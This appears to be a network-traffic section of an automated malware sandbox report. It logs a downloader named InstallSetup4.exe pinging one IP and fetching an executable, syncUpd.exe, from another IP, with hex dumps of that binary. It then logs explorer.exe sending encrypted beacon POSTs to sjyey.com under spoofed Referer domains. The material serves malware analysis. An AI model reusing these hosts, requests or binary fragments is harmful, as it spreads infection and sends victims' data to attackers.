                                                                                                                                                                    Feb 8, 2024 19:09:04.288036108 CET1286INData Raw: 73 10 2b f3 56 6a 00 03 df 53 e8 11 1f 00 00 83 c4 0c 8b c7 5f 5e 5b 5d c3 8b ff 56 57 33 f6 bf 60 a8 42 00 83 3c f5 cc 81 42 00 01 75 1d 8d 04 f5 c8 81 42 00 89 38 68 a0 0f 00 00 ff 30 83 c7 18 ff 15 08 41 42 00 85 c0 74 0c 46 83 fe 24 7c d3 33
                                                                                                                                                                    Data Ascii: s+VjS_^[]VW3`B<BuB8h0ABtF$|3@_^$B3SABVBW>t~tWWc&YB|B_t~uPB|^[UE4B@AB]t$jDABh@Yjh@fB{
                                                                                                                                                                    Feb 8, 2024 19:09:04.288049936 CET1286INData Raw: a3 bc a9 42 00 eb 61 ff 35 b8 a9 42 00 ff 15 ac 40 42 00 89 45 e4 3b f7 74 4e 56 ff 15 a8 40 42 00 a3 b8 a9 42 00 eb 40 ff 35 c0 a9 42 00 ff 15 ac 40 42 00 89 45 e4 3b f7 74 2d 56 ff 15 a8 40 42 00 a3 c0 a9 42 00 eb 1f ff 35 b4 a9 42 00 ff 15 ac
                                                                                                                                                                    Data Ascii: Ba5B@BE;tNV@BB@5B@BE;t-V@BB5B@BE;tV@BBE}uE8]j+Yt$tt~~j hfB3}}]KtjY+t"+t+tY+uC1


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.349734185.172.128.90804048C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:03.985112906 CET152OUTGET /cpa/ping.php?substr=four&s=ab HTTP/1.1
                                                                                                                                                                    User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                                                    Host: 185.172.128.90
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Feb 8, 2024 19:09:04.869235039 CET204INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:04 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Content-Length: 1
                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Data Raw: 30
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.349735185.172.128.127804048C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:05.212352991 CET135OUTGET /syncUpd.exe HTTP/1.1
                                                                                                                                                                    User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                                                    Host: 185.172.128.127
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Feb 8, 2024 19:09:05.454540968 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:05 GMT
                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                    Last-Modified: Thu, 08 Feb 2024 18:00:02 GMT
                                                                                                                                                                    ETag: "34e00-610e2949adafe"
                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                    Content-Length: 216576
                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 a1 83 dd b2 c0 ed 8e b2 c0 ed 8e b2 c0 ed 8e dd b6 46 8e a7 c0 ed 8e dd b6 73 8e a1 c0 ed 8e dd b6 47 8e ea c0 ed 8e bb b8 7e 8e b7 c0 ed 8e b2 c0 ec 8e d1 c0 ed 8e dd b6 42 8e b3 c0 ed 8e dd b6 77 8e b3 c0 ed 8e dd b6 70 8e b3 c0 ed 8e 52 69 63 68 b2 c0 ed 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 0e 31 24 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 ca 02 00 00 34 7b 02 00 00 00 00 ac 14 00 00 00 10 00 00 00 e0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 7e 02 00 04 00 00 02 42 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 08 03 00 3c 00 00 00 00 f0 7d 02 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 05 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 02 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 c9 02 00 00 10 00 00 00 ca 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 31 00 00 00 e0 02 00 00 32 00 00 00 ce 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 85 7a 02 00 20 03 00 00 1e 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 73 6f 77 61 00 00 00 7c 00 00 00 00 b0 7d 02 00 02 00 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 cd 09 00 00 00 c0 7d 02 00 0a 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 78 65 79 65 6b 75 73 0c 00 00 00 00 d0 7d 02 00 02 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6a 65 6a 6f 6c 00 00 00 04 00 00 00 e0 7d 02 00 04 00 00 00 2c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 1c 00 00 00 f0 7d 02 00 1e 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$FsG~BwpRichPEL1$c4{@~B$<}0X.text `.rdata12@@.dataz @.sowa|}@.tls} @.xeyekus}*@@.jejol},@.rsrc0}0@@
                                                                                                                                                                    Feb 8, 2024 19:09:05.454579115 CET1286INData Raw: 89 35 a8 3e 43 00 89 3d a4 3e 43 00 66 8c 15 d0 3e 43 00 66 8c 0d c4 3e 43 00 66 8c 1d a0 3e 43 00 66 8c 05 9c 3e 43 00 66 8c 25 98 3e 43 00 66 8c 2d 94 3e 43 00 9c 8f 05 c8 3e 43 00 8b 45 00 a3 bc 3e 43 00 8b 45 04 a3 c0 3e 43 00 8d 45 08 a3 cc
                                                                                                                                                                    Data Ascii: 5>C=>Cf>Cf>Cf>Cf>Cf%>Cf->C>CE>CE>CE>C>C>C=C=C=C C CB>Cj+YjBhBB=>CujYhBPBUE3;
                                                                                                                                                                    Feb 8, 2024 19:09:05.454593897 CET1286INData Raw: 85 c0 75 10 8b 0e 85 c9 74 02 ff d1 83 c6 04 3b 75 0c 72 ec 5e 5d c3 8b ff 55 8b ec 8b 4d 08 85 c9 75 15 e8 f8 fb ff ff c7 00 16 00 00 00 e8 7d 17 00 00 6a 16 58 5d c3 a1 00 41 43 00 85 c0 74 e2 89 01 33 c0 5d c3 8b ff 55 8b ec 8b 4d 08 85 c9 75
                                                                                                                                                                    Data Ascii: ut;ur^]UMu}jX]ACt3]UMuMjX]@Ct3]U=(Bth(B$Ytu(BY#hBhBAYYuTVWh)@BBY;st;r=t_^tht
                                                                                                                                                                    Feb 8, 2024 19:09:05.454802990 CET1286INData Raw: 93 19 74 0e 3d 22 05 93 19 74 07 3d 00 40 99 01 75 05 e8 13 17 00 00 33 c0 5d c2 04 00 68 bf 1e 40 00 ff 15 c8 e0 42 00 33 c0 c3 8b ff 55 8b ec 83 7d 08 00 74 14 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c e8 f4 11 00 00 5d c3 8b ff 55 8b ec 33
                                                                                                                                                                    Data Ascii: t="t=@u3]h@B3U}tuuuuu]U3M;Bt@r3]B]U C3ESVuWV3Y;ljV%YjE%Yu= C6hBhACW$
                                                                                                                                                                    Feb 8, 2024 19:09:05.454869986 CET1286INData Raw: 00 e8 2b ed ff ff 83 25 ec 40 43 00 00 83 c8 ff eb e4 33 c0 50 50 50 50 50 e8 1a 0d 00 00 cc 8b ff 55 8b ec 8b 45 08 a3 fc 40 43 00 5d c3 8b ff 55 8b ec 51 8b 4d 10 53 33 c0 56 89 07 8b f2 8b 55 0c c7 01 01 00 00 00 39 45 08 74 09 8b 5d 08 83 45
                                                                                                                                                                    Data Ascii: +%@C3PPPPPUE@C]UQMS3VU9Et]EE>"u39E"FE<tBUPFg#Yt}tMEFUMt2}u tutBe>< t<uFN>}tEE
                                                                                                                                                                    Feb 8, 2024 19:09:05.454895020 CET1286INData Raw: 3e 83 f8 02 75 06 80 4e 04 40 eb 09 83 f8 03 75 04 80 4e 04 08 68 a0 0f 00 00 8d 46 0c 50 ff 15 08 e1 42 00 85 c0 74 2c ff 46 08 eb 0a 80 4e 04 40 c7 06 fe ff ff ff 43 83 fb 03 0f 8c 68 ff ff ff ff 35 5c a4 bd 02 ff 15 04 e1 42 00 33 c0 5f 5b 5e
                                                                                                                                                                    Data Ascii: >uN@uNhFPBt,FN@Ch5\B3_[^VW`t6;s!p~tVB@N;r7'Y`|_^VCCW;st;r_^VCCW;st;
                                                                                                                                                                    Feb 8, 2024 19:09:05.454909086 CET1286INData Raw: 42 00 a3 4c 48 43 00 74 16 83 3d 44 48 43 00 00 74 0d 83 3d 48 48 43 00 00 74 04 85 c0 75 24 a1 18 e1 42 00 a3 44 48 43 00 a1 20 e1 42 00 c7 05 40 48 43 00 f1 29 40 00 89 35 48 48 43 00 a3 4c 48 43 00 ff 15 14 e1 42 00 a3 c4 21 43 00 83 f8 ff 0f
                                                                                                                                                                    Data Ascii: BLHCt=DHCt=HHCtu$BDHC B@HC)@5HHCLHCB!C5DHCP5@HC5B5DHC@HC5HHCDHC5LHCHHCLHCtc=Bh+@5@HC!CtDhj<YYt0V5!C5HHC
                                                                                                                                                                    Feb 8, 2024 19:09:05.454972029 CET1286INData Raw: 59 85 c0 75 a9 eb 07 e8 f6 e2 ff ff 89 30 e8 ef e2 ff ff 89 30 8b c7 5f 5e eb 14 53 e8 16 ff ff ff 59 e8 db e2 ff ff c7 00 0c 00 00 00 33 c0 5b 5d c3 8b ff 55 8b ec 83 7d 08 00 75 0b ff 75 0c e8 59 ff ff ff 59 5d c3 56 8b 75 0c 85 f6 75 0d ff 75
                                                                                                                                                                    Data Ascii: Yu00_^SY3[]U}uuYY]VuuuY3MW0uFVuj5@C<Bu^9XHCt@VYtvVYa3_^]PBPY8BPYUMS3;vj3X
                                                                                                                                                                    Feb 8, 2024 19:09:05.454986095 CET1286INData Raw: fb 0f 0f 84 a3 00 00 00 83 fb 08 74 0e 83 fb 04 74 09 83 fb 0b 0f 85 a4 01 00 00 e8 3a f3 ff ff 8b f0 85 f6 0f 84 95 01 00 00 bf f8 eb 42 00 39 7e 5c 75 27 ff 35 90 ec 42 00 e8 87 df ff ff 59 89 46 5c 85 c0 0f 84 74 01 00 00 ff 35 90 ec 42 00 57
                                                                                                                                                                    Data Ascii: tt:B9~\u'5BYF\t5BWPv\YQHMM.HBkV\x;9tj'Ye;tu>=ICu5jh6@LB3A;uIC%B
                                                                                                                                                                    Feb 8, 2024 19:09:05.666702032 CET1286INData Raw: 1c 00 00 83 c4 14 89 85 70 ff ff ff 85 c0 74 58 46 56 50 e8 ed da ff ff 8b d8 59 59 85 db 74 48 ff b5 70 ff ff ff 89 b5 74 ff ff ff 53 ff 75 14 ff 75 10 ff b5 78 ff ff ff e8 00 1c 00 00 8b f0 83 c4 14 85 f6 74 1a 6a 01 56 e8 b6 da ff ff 89 07 33
                                                                                                                                                                    Data Ascii: ptXFVPYYtHptSuuxtjV3YY;u!9ttSYM_^3[NQSVPu9ttSxY3WWWWWp}uH5<B3PPuutjS3YYtSPuuu7$'Y
                                                                                                                                                                    Feb 8, 2024 19:09:05.666718006 CET1286INData Raw: ed 42 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 a8 e0 42 00 50 ff d6 68 58 ed 42 00 53 a3 d0 49 43 00 ff d7 50 ff d6 68 44 ed 42 00 53 a3 d4 49 43 00 ff d7 50 ff d6 68 28 ed 42 00 53 a3 d8 49 43 00 ff d7 50 ff d6 a3 e0 49 43 00 85 c0 74 10 68 10
                                                                                                                                                                    Data Ascii: BS5BPhXBSICPhDBSICPh(BSICPICthBSPICICM5B;tG9ICt?P5ICt,t(tMQjMQjPtEuM 3IC;Et)Pt"EtIC;EtPtuE5IC


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.349744109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:29.768635988 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ejsaldmhrhy.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 335
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:29.768874884 CET335OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 01 cb a5
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA .[k,vu0J\A>,BE2jPmkKs)4aQ76cI1%ItuF@E9MeQa@,GL`vR$mqt#AK
                                                                                                                                                                    Feb 8, 2024 19:09:30.191299915 CET253INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:29 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 04 00 00 00 72 e8 85 ec
                                                                                                                                                                    Data Ascii: r


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.349745109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:30.429106951 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://jwwqbntilchktla.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 260
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:30.429239988 CET260OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 78 23 ea 84
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vux#EinkhO*8vj\2RC~!Q58']9(ViA%+xfo?z!Mmg.'6N_;8kWGXz~;
                                                                                                                                                                    Feb 8, 2024 19:09:30.861133099 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:30 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    8192.168.2.349747109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:31.104696989 CET278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://ekglkealsuv.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 138
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:31.104892969 CET138OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5c 4b ea 8d
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vu\Kc!YKdaKt9UD,(F#V69
                                                                                                                                                                    Feb 8, 2024 19:09:31.538670063 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:31 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    9192.168.2.349748109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:31.844312906 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://jglsuyopagjgttb.net/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 278
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:31.844351053 CET278OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 74 1b e6 bd
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vut(aVIOl<E7q,f{?=*H,3IURaE)S_x7:F*t>y,qi>Q()!&ZVC;<xbNp:oA#k
                                                                                                                                                                    Feb 8, 2024 19:09:32.267283916 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:09:32 GMT
                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                    X-Powered-By: PHP/7.4.15
                                                                                                                                                                    Content-Length: 340
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    10192.168.2.349749109.175.29.3980640C:\Windows\explorer.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:09:32.506572008 CET282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                    Accept: */*
                                                                                                                                                                    Referer: http://yufkomdohplkmcw.org/
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                    Content-Length: 326
                                                                                                                                                                    Host: sjyey.com
                                                                                                                                                                    Feb 8, 2024 19:09:32.506617069 CET326OUTData Raw: 3b 6e 24 10 82 cc 1d 25 db dc c0 0a 74 07 0b b7 0c 78 cc 91 1a 03 97 6a 79 78 72 e5 32 b0 c2 6a 9f 56 cf 21 06 6a 50 1c ef 98 3f cb 2e 25 d5 f9 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 39 47 a3 ab
                                                                                                                                                                    Data Ascii: ;n$%txjyxr2jV!jP?.%Yt M@NA -[k,vu9GmLa6;3dBA[eCT>`*<DM#AglZx?<2])9,<,ThM>E+:DJ
